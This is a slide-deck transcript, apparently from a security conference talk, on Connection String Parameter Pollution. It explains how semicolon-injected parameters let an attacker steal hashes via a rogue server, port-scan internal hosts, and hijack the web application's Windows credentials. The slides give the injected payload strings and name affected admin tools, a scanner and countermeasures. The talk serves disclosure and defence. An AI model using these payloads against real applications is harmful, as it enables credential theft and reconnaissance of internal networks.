Connection String Parameter Pollution Attacks

p
Chema Alonso & Palako
Informática 64
Chema Alonso
Informática 64

ConnectionStrings
Define thewayanapplicationconnectsto data repository
There are connectionstringsfor:
RelationalDatabases (MSSQL, Oracle, MySQL,…)
LDAP Directories
Files
Etc…

DatabasesConnectionStrings
Data Source = myServerAddress;
InitialCatalog = myDataBase;
User Id = myUsername;
Password = myPassword;

DB Connectionbuild up

Google Hacking

UDL (Universal Data Links) Files

HowWebappconnectsto DB
OperatingSystemAccounts
DatabaseCredentials
User Id =;
Password =;
Integrated Security = SSPI/True/Yes;
Password = myPassword;
Integrated Security = No;

Usersauthenticatedby Web App
Web applicationmanagestheloginprocess
Syslogins
1.- Web applicatonconnectsusingitscredentialstothedatabase.
2.- Asksuserlogininformation.
3.- Checkslogininformationaboutinfostored in customuserstable.
Connectionstring
Customuserstable
Select id fromusers
DatabaseEngine
Apprunningon Web Server

UsersautheticatedbyDatabase
Databaseenginemanagestheloginprocess
1.- Web applicationasksforcredentials.
2.- A connectionstringiscomposedwiththecredentialstoconnecttothedatabase.
3.- Roles and permits are limitedbytheuserused in theconnectionstring
Syslogins
Connectionstring
DatabaseEngine
Apprunningon Web Server

ConnectionStringAttacks
It´spossibletoinjectparametersintoconnectionstringsusingsemicolons as a separator
Integrated Security = NO;
Password = myPassword; Encryption = Off;

ConnectionStringBuilder
Available in .NET Framework 2.0
Buildsecureconnectionstringsusingparameters
It´snotpossibletoinjectintotheconnectionstring

Are peopleaware of this?

ConnectionStringParameterPollution
The goal is to inject parameters in the connection string, whether they exist or not
Had duplicated a parameter, the last value wins
This behavior allows attackers to overwrite completely the connection string, therefore to manipulate the way the application will work and how should be the it authenticated

PollutionableBehavior
Param1=Value A
Param2=Value B
Param1=Value C
Param2=Value D
DBConnectionObject
Param1
Param2

What can be done with CSPP?Overwrite a parameter
Data Source=DB1
UID=sa
Data Source=DB2
password=Pwnd!
DBConnectionObject
DataSource
UID
password

Scanningthe DMZ
DevelopmentDatabase 1
FinnacialDatabase
Test Database
ForgottenDatabase
Internet
FW
Web app vulnerable to CSPP
ProductionDatabase
Data
Source

Port Scanning a Server
ProductionDatabase
Server
FW
DataSource
DB1,80
Internet
Web app vulnerable to CSPP
DB1,21
DB1,25
DB1,1445

What can be done with CSPP?Add a parameter
Data Source=DB1
UID=sa
Integrated Security=True
password=Pwnd!
DBConnectionObject
DataSource
UID
password

CSPP Attack 1: Hash stealing
1.- Run a Rogue Server onanaccessible IP address:
Rogue_Server
2.- Activate a snifferto catch theloginprocess
Cain/Wireshark
3.- Overwrite Data Sourceparameter
Data_Source=Rogue_Server
4.- Force Windows IntegratedAuthentication
Integrated Security=true

CSPP Attack 1: Hash stealing
Data source = SQL2005; initial catalog = db1;
Integrated Security=no; user id=+’User_Value’+;
Password=+’Password_Value’+;
Integrated Security=no; user id=;Data Source=Rogue_Server;
Password=;Integrated Security=True;

CSSP 1:ASP.NET Enterprise Manager

CSPP Attack 2: Port Scanning
1.- Duplicatethe Data Sourceparametersettingthe Target server and target porttobescanned. Data_Source=Target_Server,target_Port
2.- Checkthe error messages:
- No TCP Connection -> Port isclosed
- No SQL Server -> Port is open
- InvalidPassword -> SQL Server there!

CSPP Attack 2: Port Scanning
Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port;
Password=;Integrated Security=True;

CSPP 2: myLittleAdmin
Port is Open

CSPP 2: myLittleAdmin
Port isClosed

CSPP Attack 3: Hijacking Web Credentials
1.- Duplicate Data Sourceparametertothe target SQL Server
Data_Source=Target_Server
2.- Force Windows Authentication
Integrated Security=true
3.- Application pool in whichthe web appisrunningonwillsenditscredentials in orderto log in tothedatabaseengine.

CSPP Attack 3: Hijacking Web Credentials
Integrated Security=no; user id=;Data Source=Target_Server;
Password=;Integrated Security=true;

CSPP Attack 3: Web Data Administrator

CSPP Attack 3: myLittleAdmin/myLittleBackup

CSPP Attack 3: ASP.NET Enterprise Manager

OtherDatabases
MySQL
Does not support Integrated security
It´s possible to manipulate the behavior of the web application, although
Port Scanning
Connect to internal/testing/for developing Databases
Steal credentials
Oracle supports integrated authority running on Windows and UNIX/Linux servers
It´s possible to perform all described attacks
Hash stealing
Port Scanning
Hijacking Web credentials
Also it´s possible to elevate a connection to sysdba in order to shutdown/startup an instance

Demo
Demo

Scanner
Proof of concept to test yournetwork
Try a hijacking web credentialsattack
Written in ASP.NET C#
Free download (codeinclude of course)
http://www.informatica64.com/csppScanner.aspx

CSPP Scanner

Scanner CSPP: Attacks

Demo
Demo

myLittleAdmin/myLittleBackup
myLittleToolsreleased a securyadvisory and a patchaboutthis

ASP.NET Enterprise Manager
ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels.
Fix the code yourself

ASP.NET Web Data Admistrator
ASP Web Data Administratorissecure in CodePlex web site, butnot in Microsoft web sitewhereanunsecureoldversioniswaspublished

Countermeasures
Hardenyour firewall
Outboundconnections
Reviewyourinternalaccountspolicy
Web application
Web server
DatabaseEngine
Use ConnectionStringBuilder
Filterthe;)

Questions?
Contacto
Chema Alonso
chema@informatica64.com
http://www.informatica64.com
http://elladodelmal.blogspot.com
http://twitter.com/chemaalonso
José Palazón “Palako”
palako@lateatral.com
Authors
Chema Alonso
Manuel Fernández “The Sur”
Alejandro Martín Bailón
Antonio Guzmán

http://elladodelmal.blogspot.com	255
http://www.elladodelmal.com	149
http://www.slideshare.net	9
http://translate.googleusercontent.com	3
http://www.elladodelmal.blogspot.com	2

Connection String Parameter Pollution Attacks

by Chema Alonso on Feb 02, 2010

Accessibility

Tags

Upload Details

Usage Rights

5 Embeds 418

Statistics

Connection String Parameter Pollution Attacks — Presentation Transcript